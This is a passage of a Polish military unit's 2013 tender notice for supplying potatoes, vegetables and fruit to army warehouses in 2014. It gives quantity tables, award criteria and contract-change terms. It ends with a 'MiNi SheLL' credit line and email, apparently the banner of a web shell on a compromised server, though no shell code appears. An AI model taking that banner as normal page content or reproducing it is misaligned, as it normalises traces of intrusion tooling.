<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy ­ wypełniony i podpisany wg wzoru Zamawiającego załącznik nr 2 do SIWZ. Zestawienie cenowe przedmiotu zamówienia ­wypełniony i podpisany wg wzoru Zamawiającego załącznik nr 3, 4 do SIWZ. Dowód wniesienia wadium
Pełnomocnictwo. W przypadku podpisania oferty lub załączonego do niej 
jakiegokolwiek dokumentu i oświadczenia przez osobę nieuprawnioną  do reprezentacji wprost z postanowień KRS lub CEIDG Centralna Ewidencja i Informacja o 
Działalności Gospodarczej należy dołączyć pełnomocnictwo, sporządzone zgodnie z wymaganiami Kodeksu Cywilnego  oryginał lub notarialnie potwierdzoną kopię dokumentu.  W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu zgodnie z art. 23 ustawy pzp
W przypadku, gdy Wykonawca polega na wiedzy 
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne w oryginale zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem § 17 ust. 2 umowy. Zamawiający, zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych, przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy, jeżeli dotyczą one:
a. zmiany wysokości zobowiązania określonego w § 4 ust. 1 umowy, w przypadku zmiany stawki podatku od towarów i usług w okresie obowiązywania umowy, b. zmiany częstotliwości dostaw oraz przedziału godzinowego przyjmowania dostaw przez Odbiorców, c. zmiany dodania odbiorcy i miejsca dostawy, d. zmian lub wprowadzenia nowych przepisów dotyczących przedmiotu umowy, wymagających od stron umowy, dostosowania treści umowy do tych przepisów z zachowaniem postanowień ust. 1. e. Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności. f. Zmiana umowy dokonana z naruszeniem przepisy paragrafu są nieważne. 1. Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności. 2. Zmiana umowy dokonana z naruszeniem przepisów paragrafu są nieważne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl, http://www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU, Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO, budynek sztabowy pok. 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 08:00, miejsce: JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU, Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO, budynek Sztabu, Kancelaria Jawna pokój nr 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa ziemniaków i warzyw gr. I i II do magazynów jednostek wojskowych w: Bemowie Piskim, Orzyszu, Węgorzewie, Giżycku, Gołdapi oraz Przedszkolu wojskowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - dostawa ziemniaków i warzyw gr. I i II do magazynów jednostek wojskowych w: Bemowie Piskim, Orzyszu, Węgorzewie, Giżycku, Gołdapi oraz Przedszkolu wojskowym.Lp.Nazwa produktu Jm	Jednostka Wojskowa 4352 Giżycko,  ul. Nowowiejska 20 , 11-500  Giżycko Łączna ilość na 2014r. Magazyn Bemowo Magazyn Orzysz	
Magazyn Gołdap	Przedszkole Bemowo Magazyn Węgorzewo	 Magazyn Giżycko	
1.Ziemniaki jadalne	kg	0	120	180	2 000	300	120	2 720
2.Ziemniaki wczesne	kg	0	30	45	0	100	30	205
3.Buraki ćwikłowe	kg	7 400	1 400	440	150	1 200	1 140	11 730
4.Marchew	kg	12 000	2 200	800	300	2 000	1 920	19 220
5.Pietruszka korzeniowa	kg	3 200	460	200	40	440	480	4 820
6.Seler korzeniowy	kg	3 400	460	260	150	600	480	5 350
7.Cebula	kg	10 000	1 500	500	70	1 400	1 100	14 570
8.Por	kg	4 000	380	160	120	520	460	5 640
9.Kapusta biała	kg	8 000	2 180	600	200	1 000	1 200	13 180
10.Kapusta czerwona	kg	3 000	700	160	60	500	360	4 780
11.Czarna rzepa	kg	800	60	40	0	40	200	1 140
12.Fasolka szparagowa	kg	200	60	200	40	400	80	980
13.Papryka słodka	kg	320	140	60	30	100	200	850
14.Pomidory	kg	2 000	780	120	100	480	540	4 020
15.Ogórki	kg	2 000	560	120	100	400	500	3 680
16.Sałata	kg	400	180	100	10	200	160	1 050
17.Brokuły	kg	100	48	40	30	100	100	418
18.Kapusta włoska	kg	1 600	100	100	0	200	60	2 060
19.Kapusta pekińska	kg	2 200	120	200	70	200	100	2 890
20.Kapusta brukselska	kg	200	200	40	0	100	40	580
21.Kalafior	kg	400	160	80	80	600	200	1 520
22.Rzodkiewka	kg	400	300	40	8	100	180	1 028
23.Natka pietruszki	kg	80	40	24	0	40	40	224
24.Koperek zielony	kg	100	40	24	0	40	48	252
25.Szczypiorek	kg	100	20	20	3	40	28	211
26.Czosnek	kg	80	32	32	0	80	20	244
27.Pieczarki	kg	1 200	108	160	30	400	180	2 078.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.21.21.00-1, 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa owoców gr. I do magazynów jednostek wojskowych w: Bemowie Piskim, Orzyszu, Węgorzewie, Giżycku, Gołdapi oraz Przedszkolu wojskowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców gr. I do magazynów jednostek wojskowych w: Bemowie Piskim, Orzyszu, Węgorzewie, Giżycku, Gołdapi oraz Przedszkolu wojskowym.
Lp. Nazwa produktu Jm	Jednostka Wojskowa 4352 Giżycko,  ul. Nowowiejska 20 , 11-500  Giżycko	Łączna ilość na 2014r. Magazyn Bemowo	Magazyn Orzysz	Magazyn Gołdap	Przedszkole Bemowo	Magazyn Węgorzewo	Magazyn Giżycko	
1.Banany	kg	4 400	1 000	300	900	550	480	7 630
2.Cytryny	kg	1 000	160	100	30	120	60	1 470
3.Pomarańcze	kg	4 000	920	320	0	240	300	5 780
4.Mandarynki	kg	2 200	920	120	300	320	220	4 080
5.Grejfruty	kg	1 400	180	0	0	0	40	1 620
6.Kiwi	kg	1 040	40	40	0	100	0	1 220
7.Morele	kg	520	0	0	0	0	0	520
8.Brzoskwinie	kg	520	0	50	0	40	0	610
9.Winogrona	kg	520	12	40	0	40	0	612
10.Jabłka kg	22 000	3 400	1 600	1 000	2 000	2 000	32 000
11.Gruszki	kg	800	200	80	450	320	240	2 090.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com